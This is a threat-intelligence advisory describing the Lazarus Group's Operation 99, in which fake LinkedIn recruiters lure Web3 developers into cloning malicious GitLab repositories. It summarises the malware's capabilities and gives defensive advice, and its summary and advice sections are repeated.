Lazarus Group Targets Web3 Developers with Fake LinkedIn Profiles in Operation 99
Summary:
The North Korea-nexus APT, Lazarus Group, has been observed conducting a new cyber attack campaign dubbed Operation 99. This campaign targets software developers who are searching for freelance Web3 and cryptocurrency work to ultimately embed malware into the victim’s environment. The campaign’s infection chain begins with fake recruiters on platforms like LinkedIn using project tests and code reviews as a social engineering tactic against potential victims. Once the victim is successfully lured, they are directed to a rogue GitLab page and asked to clone the malicious GitLab repository. Lazarus is excellent at masquerading their attacks. The repository seems harmless but the cloned code connects to C2 infrastructure and embeds malware on the victim’s endpoint. This is a global campaign targeting many victims in multiple countries, with attacks concentrated in Italy, but also targeting the US. The campaign name is derived from the malicious artifacts with version identifiers labeled "pay99." The malware embedded in the repository serves as a downloader for the main payloads, Payload99, Brow99, and MCLIP. The malware architecture adopts a modular design and is flexible, and capable of working across Windows, macOS, and Linux operating systems.
This campaign was uncovered on January 9th, 2025, and builds on job-themed social engineering tactics previously observed in successful Lazarus APT attacks like Operation Dream Job, which also focused on targeting developers. North Korean threat actors continue to improve the job-themed lures, increasing sophistication and authenticity to trick developers who may be cautious of GitLab-themed phishing attempts. By utilizing AI-generated recruiter profiles and realistic HR communication techniques, Lazarus crafts highly convincing fake scenarios that deceive even the most vigilant users due to their ongoing refinement of these tactics, enhancing their success in exploiting human trust and curiosity. Unlike their other most recently documented campaign where Lazarus targets the Defense Industrial Base sector with fake skills assessments for IT positions, Operation 99 has a particular focus on targeting Web3 and cryptocurrency developers, using GitLab as a very effective malware delivery vehicle. However, the main payloads that were downloaded indicate the main goal of this campaign is cyber espionage while also engaging in direct theft by stealing cryptocurrency wallet keys like low-hanging fruit when possible. The malware architecture's ability to work across Windows, macOS, and Linux operating systems highlights nation-state threat actors’ adaptable nature. These campaigns are double-pronged attacks that provide the financial means to fund the North Korean regime as they steal secrets from other countries, circumventing international sanctions.
Suggested Corrections:
The IT sector is especially vulnerable to targeted attacks due to an increase in remote work opportunities. To defend against this type of threat:
https://thehackernews.com/2025/01/lazarus-group-targets-web3-developers.html
https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/
The North Korea-nexus APT, Lazarus Group, has been observed conducting a new cyber attack campaign dubbed Operation 99. This campaign targets software developers who are searching for freelance Web3 and cryptocurrency work to ultimately embed malware into the victim’s environment. The campaign’s infection chain begins with fake recruiters on platforms like LinkedIn using project tests and code reviews as a social engineering tactic against potential victims. Once the victim is successfully lured, they are directed to a rogue GitLab page and asked to clone the malicious GitLab repository. Lazarus is excellent at masquerading their attacks. The repository seems harmless but the cloned code connects to C2 infrastructure and embeds malware on the victim’s endpoint. This is a global campaign targeting many victims in multiple countries, with attacks concentrated in Italy, but also targeting the US. The campaign name is derived from the malicious artifacts with version identifiers labeled "pay99." The malware embedded in the repository serves as a downloader for the main payloads, Payload99, Brow99, and MCLIP. The malware architecture adopts a modular design and is flexible, and capable of working across Windows, macOS, and Linux operating systems.
- Payload99/73 (and its functionally similar Payload5346), which collects system data (e.g., files and clipboard content), terminates web browser processes, executes arbitrary code, and establishes a persistent connection to the C2 server
- Brow99/73, which steals data from web browsers to facilitate credential theft
- MCLIP, which monitors and exfiltrates keyboard and clipboard activity in real-time
This campaign was uncovered on January 9th, 2025, and builds on job-themed social engineering tactics previously observed in successful Lazarus APT attacks like Operation Dream Job, which also focused on targeting developers. North Korean threat actors continue to improve the job-themed lures, increasing sophistication and authenticity to trick developers who may be cautious of GitLab-themed phishing attempts. By utilizing AI-generated recruiter profiles and realistic HR communication techniques, Lazarus crafts highly convincing fake scenarios that deceive even the most vigilant users due to their ongoing refinement of these tactics, enhancing their success in exploiting human trust and curiosity. Unlike their other most recently documented campaign where Lazarus targets the Defense Industrial Base sector with fake skills assessments for IT positions, Operation 99 has a particular focus on targeting Web3 and cryptocurrency developers, using GitLab as a very effective malware delivery vehicle. However, the main payloads that were downloaded indicate the main goal of this campaign is cyber espionage while also engaging in direct theft by stealing cryptocurrency wallet keys like low-hanging fruit when possible. The malware architecture's ability to work across Windows, macOS, and Linux operating systems highlights nation-state threat actors’ adaptable nature. These campaigns are double-pronged attacks that provide the financial means to fund the North Korean regime as they steal secrets from other countries, circumventing international sanctions.
Suggested Corrections:
The IT sector is especially vulnerable to targeted attacks due to an increase in remote work opportunities. To defend against this type of threat:
- Vigilance Against Social Engineering: Verify recruiters and job offers on platforms like LinkedIn.
- Repository Security: Scrutinize Git repositories before cloning, especially when working in high-stakes sectors.
- Endpoint Protection: Use advanced endpoint security solutions to detect unusual activity.
- Training and Awareness: Equip developers with the knowledge to identify red flags in emails, repositories, and LinkedIn profiles.
https://thehackernews.com/2025/01/lazarus-group-targets-web3-developers.html
https://securityscorecard.com/blog/operation-99-north-koreas-cyber-assault-on-software-developers/